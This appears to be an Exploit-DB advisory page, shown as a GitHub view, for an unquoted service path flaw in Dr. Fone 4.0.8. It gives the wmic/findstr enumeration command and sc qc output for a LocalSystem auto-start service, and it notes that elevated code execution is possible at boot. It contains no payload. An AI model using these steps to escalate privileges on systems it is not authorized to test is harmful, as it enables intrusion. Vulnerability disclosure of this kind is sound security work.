
6 changes to exploits/shellcodes Kite 1.2021.610.0 - Unquoted Service Path Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path IOTransfer 4.0 - Remote Code Execution (RCE) Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS) CodoForum v5.1 - Remote Code Execution (RCE) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
48 lines
No EOL
1.6 KiB
Text
48 lines
No EOL
1.6 KiB
Text
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
|
|
# Discovery Date: 2022-05-07
|
|
# Discovery by: Esant1490
|
|
# Vendor Homepage: https://drfone.wondershare.net
|
|
# Software Link : https://download.wondershare.net/drfone_full4008.exe
|
|
# Tested Version: 4.0.8
|
|
# Tested on OS: Windows 10 Pro x64 en
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
# Find the discover Unquoted Service Path Vulnerability:
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|
|
|findstr /i /v "C:\Windows\\" |findstr /i /v """
|
|
|
|
Wondershare Install Assist Service Wondershare InstallAssist
|
|
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
|
|
|
|
Wondershare Application Framework Service WsAppService C:\Program Files
|
|
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
|
|
Wondershare Application Update Service 3.0
|
|
|
|
WsAppService3 C:\Program Files
|
|
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
|
|
|
|
Wondershare Driver Install Service WsDrvInst C:\Program Files
|
|
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
|
|
|
|
# Service info:
|
|
|
|
C:\>sc qc WsDrvInst
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: WsDrvInst
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files
|
|
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Wondershare Driver Install Service
|
|
DEPENDENCIAS : RPCSS
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
#Exploit:
|
|
|
|
A successful attempt to exploit this vulnerability could allow to execute
|
|
code during startup or reboot with the elevated privileges. |